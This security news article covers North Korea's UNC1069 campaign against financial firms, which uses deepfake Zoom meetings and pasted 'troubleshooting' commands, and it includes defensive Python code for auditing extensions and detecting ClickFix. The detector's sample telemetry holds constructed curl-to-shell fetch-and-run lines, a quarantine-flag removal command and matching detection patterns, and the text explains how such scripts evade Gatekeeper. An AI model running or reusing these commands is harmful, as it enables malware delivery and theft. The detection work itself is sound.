Deepfakes, Deception, and Data Theft: How North Korea’s UNC1069 Is Hijacking Financial Firms
A North Korean cybercrime group is weaponizing AI-powered social engineering and bespoke malware to loot cryptocurrency and outwit even the savviest financial sector targets.
When a cryptocurrency executive joined a seemingly routine Zoom call, they had no idea they were stepping onto a digital minefield. The meeting host - a familiar industry figure - spoke with conviction, but behind the screen lurked not a trusted peer, but a North Korean cybercrime syndicate armed with deepfake technology, cutting-edge malware, and a ruthless appetite for digital gold.
According to a recent Mandiant investigation, UNC1069 has moved on from conventional phishing to highly tailored, AI-assisted deception. Its latest campaign targeted a FinTech company and began with the compromise of a senior executive's Telegram account. The attackers used that account to build rapport with the victim over several weeks, then sent a Calendly link that led to a fake Zoom meeting page hosted on attacker-controlled infrastructure.
The sting's masterstroke: an AI-generated deepfake of a well-known CEO. Whether the video really was synthetic has not been confirmed, but the approach shows the group's willingness to pair new technology with psychological manipulation. During the meeting, the host staged audio "problems" and talked the victim into running "troubleshooting" commands on their own machine. Those commands were in fact the first stage of a multi-step malware infection chain.
Mandiant analysts catalogued seven distinct malware families. Among them: DEEPBREATH, a Swift-based infostealer that harvests macOS credentials and browser data; CHROMEPUSH, a C++-based browser extension posing as a Google Docs tool that captures keystrokes and cookies; and SILENCELIFT, a backdoor able to hijack the victim's Telegram communications. Only SUGARLOADER had been seen before; the others were new and purpose-built.
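A cookie- and keystroke-stealing extension like the one described above needs a recognisable set of capabilities: the cookies permission plus broad host access, and a content script injected into every page. The audit below, an added example for this article and not CHROMEPUSH or any real extension, scores extension manifests for exactly those capabilities. The manifests are constructed, the finding codes are this example's own, and the only real path is the stock location of Chrome's default profile on macOS.

```python
"""Audit browser-extension manifests for stealer-grade capabilities.

Added example for this article, not code from Mandiant or from any real
extension. Manifests below are constructed; the Chrome profile path is the
default macOS location and is only read if it exists.
"""
import glob
import json
import os

BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
CHROME_EXTENSIONS_DIR = os.path.expanduser(
    "~/Library/Application Support/Google/Chrome/Default/Extensions")


def _hosts(manifest):
    # MV3 lists hosts under host_permissions; MV2 mixes them into permissions.
    declared = set(manifest.get("host_permissions", []))
    declared |= {p for p in manifest.get("permissions", [])
                 if "://" in p or p == "<all_urls>"}
    return declared


def assess(manifest):
    """Return risk findings (stable codes, worst first) for one manifest."""
    perms = set(manifest.get("permissions", []))
    broad = bool(_hosts(manifest) & BROAD_HOSTS)
    findings = []
    if "cookies" in perms and broad:
        findings.append("cookies_all_sites")         # can lift session tokens for every site
    if any(set(cs.get("matches", [])) & BROAD_HOSTS
           for cs in manifest.get("content_scripts", [])):
        findings.append("content_script_all_pages")  # JS in every page: keystrokes, form fields
    if perms & {"webRequest", "webRequestBlocking"} and broad:
        findings.append("webrequest_all_sites")      # can observe or rewrite all traffic
    if "nativeMessaging" in perms:
        findings.append("native_messaging")          # bridge to a native binary on disk
    if "debugger" in perms:
        findings.append("debugger")                  # full DevTools-protocol access
    return findings


def audit_directory(root=CHROME_EXTENSIONS_DIR):
    """Map extension id -> (name, findings) for every manifest under root."""
    results = {}
    for path in glob.glob(os.path.join(root, "*", "*", "manifest.json")):
        ext_id = path.split(os.sep)[-3]            # .../<id>/<version>/manifest.json
        with open(path, encoding="utf-8") as fh:
            manifest = json.load(fh)
        # Names may be localisation keys like __MSG_appName__; keep them as-is.
        results[ext_id] = (manifest.get("name", "?"), assess(manifest))
    return results


# Constructed: a "Docs" helper that asks for everything a stealer needs.
FAKE_DOCS_TOOL = {
    "manifest_version": 3, "name": "Docs Format Helper", "version": "1.0.2",
    "permissions": ["cookies", "storage", "scripting"],
    "host_permissions": ["<all_urls>"],
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["content.js"],
                         "run_at": "document_start"}],
    "background": {"service_worker": "bg.js"},
}
# Constructed: an MV2-style add-on with cookie and traffic access on all hosts.
MV2_PROXY = {
    "manifest_version": 2, "name": "Fast Proxy", "version": "4.0",
    "permissions": ["cookies", "webRequest", "webRequestBlocking", "<all_urls>"],
}
# Constructed: a page styler (broad content script, but nothing else).
PAGE_STYLER = {
    "manifest_version": 3, "name": "Night Mode", "version": "2.1",
    "permissions": ["storage"],
    "content_scripts": [{"matches": ["<all_urls>"], "css": ["dark.css"]}],
}
# Constructed: minimal extension scoped to the active tab only.
TAB_NOTES = {"manifest_version": 3, "name": "Tab Notes", "version": "0.3",
             "permissions": ["storage", "activeTab"]}


if __name__ == "__main__":
    if os.path.isdir(CHROME_EXTENSIONS_DIR):
        for ext_id, (name, findings) in audit_directory().items():
            if findings:
                print(f"{ext_id}  {name}: {', '.join(findings)}")
    else:
        for m in (FAKE_DOCS_TOOL, MV2_PROXY, PAGE_STYLER, TAB_NOTES):
            print(f"{m['name']}: {assess(m) or 'no findings'}")
```

A broad content script on its own is common in legitimate extensions (page stylers, ad blockers), so treat cookies_all_sites and webrequest_all_sites as the signals worth escalating, and compare the declared name against the publisher of the store listing before trusting a "Docs" helper.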
The delivery technique, known as "ClickFix," exploits trust and technical confusion at once. The victim is shown a fake error and a "fix" to paste into a terminal, so the user launches the first stage themselves; no malicious attachment or drive-by download is needed. On macOS that matters: a script fetched with curl and piped into a shell never carries the quarantine attribute a browser download would, so Gatekeeper's checks and prompts do not apply to it. The technique is spreading among advanced actors, and AI tools such as Gemini are lowering the cost of both malware development and reconnaissance.
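The distinguishing signal of a ClickFix intrusion is not the payload but the process tree: a curl-to-shell or decode-and-run one-liner executed under an interactive terminal minutes after a browser or meeting client was in use. The detector below, an added example for this article and not Mandiant's logic, hunts for that combination over process telemetry. The events are constructed to resemble macOS endpoint telemetry; the field names, the hostnames, and the pattern list are assumptions, not indicators from the campaign.

```python
"""Hunt for ClickFix-style command execution in macOS process telemetry.

Added example for this article, not code from Mandiant or from the campaign.
Events are constructed; field names (ts, pid, ppid, name, cmdline) and the
hostnames are assumptions, not any vendor's schema or real indicators.
"""
import re
from datetime import datetime

# Apps from which a ClickFix lure is normally shown (browser or meeting client).
LURE_APPS = {"Google Chrome", "Safari", "firefox", "zoom.us"}
# Terminal emulators: a pasted "troubleshooting" command runs under one of these.
TERMINALS = {"Terminal", "iTerm2"}

# Command-line fragments typical of a one-liner copied from a fake "fix" page.
SUSPICIOUS_PATTERNS = [
    (r"\bcurl\b[^|]*\|\s*(ba|z)?sh\b", "remote script piped straight into a shell"),
    (r"\bbase64\b.*\s(-D|-d|--decode)\b", "base64 payload decoded on the fly"),
    (r"\bxattr\b.*-d\s+com\.apple\.quarantine", "Gatekeeper quarantine flag removed"),
    (r"\bosascript\b.*\bdisplay dialog\b", "AppleScript dialog (fake password prompt)"),
]

# Constructed telemetry: a Zoom session, then a pasted "audio fix", then noise.
SAMPLE_EVENTS = [
    {"ts": "2025-11-03T14:02:10Z", "pid": 400, "ppid": 1, "name": "zoom.us",
     "cmdline": "/Applications/zoom.us.app/Contents/MacOS/zoom.us"},
    {"ts": "2025-11-03T14:05:41Z", "pid": 510, "ppid": 1, "name": "Terminal",
     "cmdline": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"},
    {"ts": "2025-11-03T14:05:42Z", "pid": 511, "ppid": 510, "name": "zsh", "cmdline": "-zsh"},
    {"ts": "2025-11-03T14:06:03Z", "pid": 530, "ppid": 511, "name": "bash",
     "cmdline": 'bash -c "curl -fsSL https://zoom-fix.example/audio.sh | sh"'},
    {"ts": "2025-11-03T14:06:05Z", "pid": 531, "ppid": 530, "name": "curl",
     "cmdline": "curl -fsSL https://zoom-fix.example/audio.sh"},
    {"ts": "2025-11-03T14:06:06Z", "pid": 532, "ppid": 530, "name": "sh", "cmdline": "sh"},
    {"ts": "2025-11-03T14:06:08Z", "pid": 540, "ppid": 532, "name": "xattr",
     "cmdline": "xattr -d com.apple.quarantine /tmp/ZoomAudioFix"},
    # Benign: a developer using the same terminal an hour later.
    {"ts": "2025-11-03T15:10:00Z", "pid": 600, "ppid": 511, "name": "brew",
     "cmdline": "brew install jq"},
    # Same curl|sh shape, but from launchd with no terminal and no recent lure app.
    {"ts": "2025-11-03T15:12:00Z", "pid": 700, "ppid": 1, "name": "bash",
     "cmdline": 'bash -c "curl -fsSL https://updates.example/check | sh"'},
]


def _ts(event):
    return datetime.strptime(event["ts"], "%Y-%m-%dT%H:%M:%SZ")


def ancestry(event, by_pid):
    """Process names from the event up to the highest visible ancestor."""
    chain, seen, cur = [], set(), event
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        chain.append(cur["name"])
        cur = by_pid.get(cur["ppid"])
    return chain


def find_clickfix(events, lookback_minutes=30):
    """Return alerts for commands matching a ClickFix pattern.

    high   = run under a terminal while a lure app had started recently
    medium = only one of those two conditions holds
    low    = pattern alone (e.g. a scheduled job piping curl into sh)
    """
    by_pid = {e["pid"]: e for e in events}
    lure_starts = [_ts(e) for e in events if e["name"] in LURE_APPS]
    alerts = []
    for e in events:
        reasons = [why for pat, why in SUSPICIOUS_PATTERNS if re.search(pat, e["cmdline"])]
        if not reasons:
            continue
        chain = ancestry(e, by_pid)
        interactive = any(name in TERMINALS for name in chain)
        t = _ts(e)
        recent_lure = any(0 <= (t - s).total_seconds() <= lookback_minutes * 60
                          for s in lure_starts)
        if interactive and recent_lure:
            severity = "high"
        elif interactive or recent_lure:
            severity = "medium"
        else:
            severity = "low"
        alerts.append({"pid": e["pid"], "severity": severity, "reasons": reasons,
                       "chain": " <- ".join(chain), "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in find_clickfix(SAMPLE_EVENTS):
        print(f"[{a['severity']}] pid {a['pid']} ({a['chain']}): {'; '.join(a['reasons'])}")
```

The pattern list is deliberately short; the lever that separates a pasted lure from an automated job is the terminal in the ancestry plus the recent browser or meeting-client activity, which is why the launchd-driven curl|sh in the sample only rates "low".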
UNC1069's targeting is also narrowing: away from broad phishing and toward precision strikes on centralized exchanges, software developers, and venture capital firms in the Web3 ecosystem. The group does not just steal funds; it harvests credentials and session data, laying the groundwork for later intrusions and identity-based scams.
As the line between human and machine deception blurs, the message for financial firms is clear: vigilance alone is not enough. A meeting page that asks you to run a command to fix your audio is an attack, not support; verify the invitation through a channel you already trust and treat the request as an incident. In an era where attackers wield AI and deepfakes, every "routine" meeting can be a high-stakes con, and every click can open the vault to the next cyber heist.
WIKICROOK
- Deepfake: A deepfake is AI-generated media that imitates real people’s appearance or voice, often used to deceive by creating convincing fake videos or audio.
- Social Engineering: Social engineering is the use of deception to manipulate people into revealing confidential information or granting unauthorized system access.
- Command and Control (C&C): Command and Control (C&C) servers let attackers remotely control infected devices, send instructions, and collect stolen data from compromised systems.
- Session Token: A session token is a unique value, usually stored in a cookie, that keeps a user logged in to a website or app. If stolen, an attacker can use the account without the password and without triggering the login-time multi-factor prompt.
- Browser Extension: A browser extension is a small add-on that extends browser features but can also be abused by attackers to steal data or spy on users.